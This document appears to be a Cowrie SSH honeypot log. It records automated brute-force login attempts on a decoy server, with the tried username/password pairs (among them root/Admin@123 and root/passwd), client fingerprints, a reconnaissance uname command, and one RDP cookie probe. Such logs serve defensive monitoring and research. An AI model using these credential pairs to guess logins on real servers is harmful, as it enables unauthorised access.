{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:33:19.391426Z","src_ip":"212.227.125.160","session":"fc67bb285d02"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:33:19.437714Z","src_ip":"212.227.125.160","session":"fc67bb285d02"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-26T21:33:19.703735Z","src_ip":"212.227.125.160","session":"fc67bb285d02"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:20.864138Z","src_ip":"212.227.125.160","session":"fc67bb285d02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54778,"dst_ip":"1.2.3.4","dst_port":22,"session":"7554062447a0","protocol":"ssh","message":"New connection: 212.227.125.160:54778 (1.2.3.4:22) [session: 7554062447a0]","sensor":"my-vps","timestamp":"2025-08-26T21:33:25.149254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:33:25.150974Z","src_ip":"212.227.125.160","session":"7554062447a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:33:25.590969Z","src_ip":"212.227.125.160","session":"7554062447a0"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:33:25.763451Z","src_ip":"212.227.125.160","session":"7554062447a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:33:25.933612Z","src_ip":"212.227.125.160","session":"7554062447a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:33:25.934341Z","src_ip":"212.227.125.160","session":"7554062447a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:26.340692Z","src_ip":"212.227.125.160","session":"7554062447a0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:26.341776Z","src_ip":"212.227.125.160","session":"7554062447a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62247,"dst_ip":"1.2.3.4","dst_port":22,"session":"3036a178a4ad","protocol":"ssh","message":"New connection: 212.227.235.229:62247 (1.2.3.4:22) [session: 3036a178a4ad]","sensor":"my-vps","timestamp":"2025-08-26T21:33:29.368660Z"}
{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-08-26T21:33:29.369465Z","src_ip":"212.227.235.229","session":"3036a178a4ad"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:29.370493Z","src_ip":"212.227.235.229","session":"3036a178a4ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50170,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b3effae7bbc","protocol":"ssh","message":"New connection: 212.227.125.160:50170 (1.2.3.4:22) [session: 4b3effae7bbc]","sensor":"my-vps","timestamp":"2025-08-26T21:33:31.356245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:33:31.357441Z","src_ip":"212.227.125.160","session":"4b3effae7bbc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:33:31.401094Z","src_ip":"212.227.125.160","session":"4b3effae7bbc"}
{"eventid":"cowrie.login.failed","username":"beaver","password":"beaver","message":"login attempt [beaver/beaver] failed","sensor":"my-vps","timestamp":"2025-08-26T21:33:31.535141Z","src_ip":"212.227.125.160","session":"4b3effae7bbc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:32.586130Z","src_ip":"212.227.125.160","session":"4b3effae7bbc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56400,"dst_ip":"1.2.3.4","dst_port":22,"session":"02628b380d92","protocol":"ssh","message":"New connection: 217.72.205.35:56400 (1.2.3.4:22) [session: 02628b380d92]","sensor":"my-vps","timestamp":"2025-08-26T21:33:33.847121Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:33.848245Z","src_ip":"217.72.205.35","session":"02628b380d92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45556,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb7f7cc85c1a","protocol":"ssh","message":"New connection: 212.227.125.160:45556 (1.2.3.4:22) [session: fb7f7cc85c1a]","sensor":"my-vps","timestamp":"2025-08-26T21:33:36.743398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:33:36.764579Z","src_ip":"212.227.125.160","session":"fb7f7cc85c1a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:33:36.819702Z","src_ip":"212.227.125.160","session":"fb7f7cc85c1a"}
{"eventid":"cowrie.login.failed","username":"unl0","password":"unl0","message":"login attempt [unl0/unl0] failed","sensor":"my-vps","timestamp":"2025-08-26T21:33:37.170890Z","src_ip":"212.227.125.160","session":"fb7f7cc85c1a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:38.218219Z","src_ip":"212.227.125.160","session":"fb7f7cc85c1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40944,"dst_ip":"1.2.3.4","dst_port":22,"session":"76442524249f","protocol":"ssh","message":"New connection: 212.227.125.160:40944 (1.2.3.4:22) [session: 76442524249f]","sensor":"my-vps","timestamp":"2025-08-26T21:33:42.448959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:33:42.453556Z","src_ip":"212.227.125.160","session":"76442524249f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:33:42.521852Z","src_ip":"212.227.125.160","session":"76442524249f"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:33:42.979297Z","src_ip":"212.227.125.160","session":"76442524249f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:33:43.110043Z","src_ip":"212.227.125.160","session":"76442524249f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:33:43.110919Z","src_ip":"212.227.125.160","session":"76442524249f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:43.212145Z","src_ip":"212.227.125.160","session":"76442524249f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:43.213421Z","src_ip":"212.227.125.160","session":"76442524249f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36332,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa4f6a4a767f","protocol":"ssh","message":"New connection: 212.227.125.160:36332 (1.2.3.4:22) [session: aa4f6a4a767f]","sensor":"my-vps","timestamp":"2025-08-26T21:33:47.924761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:33:47.925828Z","src_ip":"212.227.125.160","session":"aa4f6a4a767f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:33:48.015267Z","src_ip":"212.227.125.160","session":"aa4f6a4a767f"}
{"eventid":"cowrie.login.failed","username":"ecs-user","password":"ecs-user","message":"login attempt [ecs-user/ecs-user] failed","sensor":"my-vps","timestamp":"2025-08-26T21:33:48.531141Z","src_ip":"212.227.125.160","session":"aa4f6a4a767f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:49.699915Z","src_ip":"212.227.125.160","session":"aa4f6a4a767f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59946,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2fe2c0162de","protocol":"ssh","message":"New connection: 212.227.125.160:59946 (1.2.3.4:22) [session: e2fe2c0162de]","sensor":"my-vps","timestamp":"2025-08-26T21:33:53.823052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:33:53.837458Z","src_ip":"212.227.125.160","session":"e2fe2c0162de"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:33:53.893561Z","src_ip":"212.227.125.160","session":"e2fe2c0162de"}
{"eventid":"cowrie.login.failed","username":"sem4","password":"sem4","message":"login attempt [sem4/sem4] failed","sensor":"my-vps","timestamp":"2025-08-26T21:33:54.137062Z","src_ip":"212.227.125.160","session":"e2fe2c0162de"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:55.205703Z","src_ip":"212.227.125.160","session":"e2fe2c0162de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55332,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7ba5162c85d","protocol":"ssh","message":"New connection: 212.227.125.160:55332 (1.2.3.4:22) [session: b7ba5162c85d]","sensor":"my-vps","timestamp":"2025-08-26T21:34:00.077395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:00.080294Z","src_ip":"212.227.125.160","session":"b7ba5162c85d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:34:00.137832Z","src_ip":"212.227.125.160","session":"b7ba5162c85d"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-26T21:34:00.391113Z","src_ip":"212.227.125.160","session":"b7ba5162c85d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:01.487846Z","src_ip":"212.227.125.160","session":"b7ba5162c85d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50724,"dst_ip":"1.2.3.4","dst_port":22,"session":"b48935f370d8","protocol":"ssh","message":"New connection: 212.227.125.160:50724 (1.2.3.4:22) [session: b48935f370d8]","sensor":"my-vps","timestamp":"2025-08-26T21:34:05.899659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:05.901185Z","src_ip":"212.227.125.160","session":"b48935f370d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:34:05.955923Z","src_ip":"212.227.125.160","session":"b48935f370d8"}
{"eventid":"cowrie.login.failed","username":"debian-spamd","password":"debian-spamd","message":"login attempt [debian-spamd/debian-spamd] failed","sensor":"my-vps","timestamp":"2025-08-26T21:34:06.157666Z","src_ip":"212.227.125.160","session":"b48935f370d8"}
